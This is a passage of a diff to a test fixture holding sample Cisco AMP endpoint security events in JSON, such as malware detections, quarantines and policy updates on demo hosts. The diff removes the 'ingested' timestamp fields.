Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "severity": 2 @@ -782,7 +773,6 @@ ], "code": "553648147", "id": "6411456342573187000", - "ingested": "2022-02-02T05:53:29.530508742Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 @@ -862,7 +852,6 @@ ], "code": "553648147", "id": "6411456342573187000", - "ingested": "2022-02-02T05:53:29.530509787Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 @@ -947,7 +936,6 @@ ], "code": "1107296274", "id": "1492784107692000800", - "ingested": "2022-02-02T05:53:29.530510988Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "severity": 4, @@ -1027,7 +1015,6 @@ ], "code": "1107296278", "id": "1458626002840536600", - "ingested": "2022-02-02T05:53:29.530512171Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "severity": 3 @@ -1092,7 +1079,6 @@ "action": "Policy Update", "code": "553648130", "id": "6583861114428195000", - "ingested": "2022-02-02T05:53:29.530513274Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -1156,7 +1142,6 @@ ], "code": "553648173", "id": "6264747552596296000", - "ingested": "2022-02-02T05:53:29.530514327Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "severity": 0 @@ -1244,7 +1229,6 @@ ], "code": "1090519054", "id": "6411444887895409000", - "ingested": "2022-02-02T05:53:29.530515364Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "severity": 2 @@ -1341,7 +1325,6 @@ ], "code": "553648143", "id": "6411444887895409000", - "ingested": "2022-02-02T05:53:29.530516517Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "severity": 2 @@ -1417,7 +1400,6 @@ ], "code": "2164260880", "id": "6419187549993959000", - "ingested": "2022-02-02T05:53:29.530517505Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1495,7 +1477,6 @@ ], "code": "1090519054", "id": "6419187549993959000", - "ingested": "2022-02-02T05:53:29.530518494Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 @@ -1594,7 +1575,6 @@ ], "code": "1090519054", "id": "6419187537109058000", - "ingested": "2022-02-02T05:53:29.530519601Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 @@ -1691,7 +1671,6 @@ ], "code": "553648143", "id": "6419187537109058000", - "ingested": "2022-02-02T05:53:29.530520694Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1755,7 +1734,6 @@ "action": "Policy Update", "code": "553648130", "id": "6583853374897127000", - "ingested": "2022-02-02T05:53:29.530521789Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -1823,7 +1801,6 @@ ], "code": "1107296272", "id": "14945825043963", - "ingested": "2022-02-02T05:53:29.530522784Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 3, @@ -1905,7 +1882,6 @@ ], "code": "1107296258", "id": "14945825043964", - "ingested": "2022-02-02T05:53:29.530523978Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 3, @@ -1983,7 +1959,6 @@ ], "code": "553648155", "id": "6533671599780921000", - "ingested": "2022-02-02T05:53:29.530524975Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "severity": 3 @@ -2057,7 +2032,6 @@ ], "code": "553648147", "id": "6533671595485954000", - "ingested": "2022-02-02T05:53:29.530525975Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective 